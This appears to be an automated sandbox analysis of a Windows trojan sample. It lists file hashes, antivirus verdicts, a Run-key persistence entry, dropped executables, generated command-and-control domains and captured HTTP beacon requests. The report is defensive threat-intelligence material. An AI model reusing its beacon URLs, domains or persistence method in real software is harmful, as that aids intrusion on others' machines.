Analysis Date2015-08-26 13:21:06
MD58b8c33042c39f1f936a379cf8886a9d6
SHA1edca77bdfed77b741dcaef865fd021f2a009683f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a8ce69279d45cfe6d8529cbe1ebedbbb sha1: f3e08a1bea6889f4bfeee4a5eff4a08520493a42 size: 295936
Section.rdata md5: b7a3f69b4a2198562ce3590f2c930baa sha1: 61ca08d0d88452388bfe12a773502d190258a8f1 size: 33280
Section.data md5: bcb4854967fd450b64dde713bbe50588 sha1: 20bd86a9ab26abc1569dfd7a4dc0a5c9c57f71ae size: 100352
Timestamp2014-10-30 09:49:27
PackerMicrosoft Visual C++ ?.?
PEhash5f9e633e0d19864245c4ad11965a22da51281dc6
IMPhash769ec76f3f98978fd8c0c52916c48dc4
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FORUCON.BMC
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVRisingno_virus
AVMcafeeTrojan-FEMT!8B8C33042C39
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Generic.jnis
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Kryptik-PJW [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Kryptik.DDQD!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader13.32603
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RPC Agent Now Adaptive Media Ordering ➝
C:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\fzfiqdp\ybhqtatag.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.tc
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fzfiqdp\rcqstcrets.exe"

Network Details:

DNSsimpleschool.net
Type: A
216.250.126.173
DNSmotherschool.net
Type: A
184.168.221.19
DNSmountainschool.net
Type: A
184.168.221.15
DNSwindowwhile.net
Type: A
95.211.230.75
DNSwinterschool.net
Type: A
82.98.134.9
DNSfinishschool.net
Type: A
208.73.211.70
DNSpossibletraining.net
Type: A
50.63.202.54
DNSlaughquestion.net
Type: A
DNSseveratherefore.net
Type: A
DNSlaughtherefore.net
Type: A
DNSsimplewhile.net
Type: A
DNSmotherwhile.net
Type: A
DNSsimplequestion.net
Type: A
DNSmotherquestion.net
Type: A
DNSsimpletherefore.net
Type: A
DNSmothertherefore.net
Type: A
DNSpossibleschool.net
Type: A
DNSmountainwhile.net
Type: A
DNSpossiblewhile.net
Type: A
DNSmountainquestion.net
Type: A
DNSpossiblequestion.net
Type: A
DNSmountaintherefore.net
Type: A
DNSpossibletherefore.net
Type: A
DNSperhapsschool.net
Type: A
DNSwindowschool.net
Type: A
DNSperhapswhile.net
Type: A
DNSperhapsquestion.net
Type: A
DNSwindowquestion.net
Type: A
DNSperhapstherefore.net
Type: A
DNSwindowtherefore.net
Type: A
DNSsubjectschool.net
Type: A
DNSwinterwhile.net
Type: A
DNSsubjectwhile.net
Type: A
DNSwinterquestion.net
Type: A
DNSsubjectquestion.net
Type: A
DNSwintertherefore.net
Type: A
DNSsubjecttherefore.net
Type: A
DNSleaveschool.net
Type: A
DNSfinishwhile.net
Type: A
DNSleavewhile.net
Type: A
DNSfinishquestion.net
Type: A
DNSleavequestion.net
Type: A
DNSfinishtherefore.net
Type: A
DNSleavetherefore.net
Type: A
DNSsweetschool.net
Type: A
DNSprobablyschool.net
Type: A
DNSsweetwhile.net
Type: A
DNSprobablywhile.net
Type: A
DNSsweetquestion.net
Type: A
DNSprobablyquestion.net
Type: A
DNSsweettherefore.net
Type: A
DNSprobablytherefore.net
Type: A
DNSseveralschool.net
Type: A
DNSmaterialschool.net
Type: A
DNSseveralwhile.net
Type: A
DNSmaterialwhile.net
Type: A
DNSseveralquestion.net
Type: A
DNSmaterialquestion.net
Type: A
DNSseveraltherefore.net
Type: A
DNSmaterialtherefore.net
Type: A
DNSseverahunger.net
Type: A
DNSlaughhunger.net
Type: A
DNSseveratraining.net
Type: A
DNSlaughtraining.net
Type: A
DNSseverastorm.net
Type: A
DNSlaughstorm.net
Type: A
DNSseverathrown.net
Type: A
DNSlaughthrown.net
Type: A
DNSsimplehunger.net
Type: A
DNSmotherhunger.net
Type: A
DNSsimpletraining.net
Type: A
DNSmothertraining.net
Type: A
DNSsimplestorm.net
Type: A
DNSmotherstorm.net
Type: A
DNSsimplethrown.net
Type: A
DNSmotherthrown.net
Type: A
DNSmountainhunger.net
Type: A
DNSpossiblehunger.net
Type: A
DNSmountaintraining.net
Type: A
DNSmountainstorm.net
Type: A
DNSpossiblestorm.net
Type: A
DNSmountainthrown.net
Type: A
DNSpossiblethrown.net
Type: A
DNSperhapshunger.net
Type: A
DNSwindowhunger.net
Type: A
HTTP GEThttp://simpleschool.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://motherschool.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://mountainschool.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://windowwhile.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://winterschool.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://finishschool.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
HTTP GEThttp://possibletraining.net/index.php?email=indogeneralsecretary@hotmail.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 216.250.126.173:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.19:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.15:80
Flows TCP192.168.1.1:1034 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1035 ➝ 82.98.134.9:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.70:80
Flows TCP192.168.1.1:1037 ➝ 50.63.202.54:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a207369 6d706c65 7363686f   Host: simplescho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a                ol.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a206d6f 74686572 7363686f   Host: motherscho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a                ol.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a206d6f 756e7461 696e7363   Host: mountainsc
0x00000080 (00128)   686f6f6c 2e6e6574 0d0a0d0a            hool.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a207769 6e646f77 7768696c   Host: windowwhil
0x00000080 (00128)   652e6e65 740d0a0d 0a0a0d0a            e.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a207769 6e746572 7363686f   Host: winterscho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a0d0a            ol.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a206669 6e697368 7363686f   Host: finishscho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a0d0a            ol.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e64 6f67656e 6572616c   mail=indogeneral
0x00000020 (00032)   73656372 65746172 7940686f 746d6169   secretary@hotmai
0x00000030 (00048)   6c2e636f 6d266d65 74686f64 3d706f73   l.com&method=pos
0x00000040 (00064)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000050 (00080)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a20706f 73736962 6c657472   Host: possibletr
0x00000080 (00128)   61696e69 6e672e6e 65740d0a 0d0a       aining.net....


Strings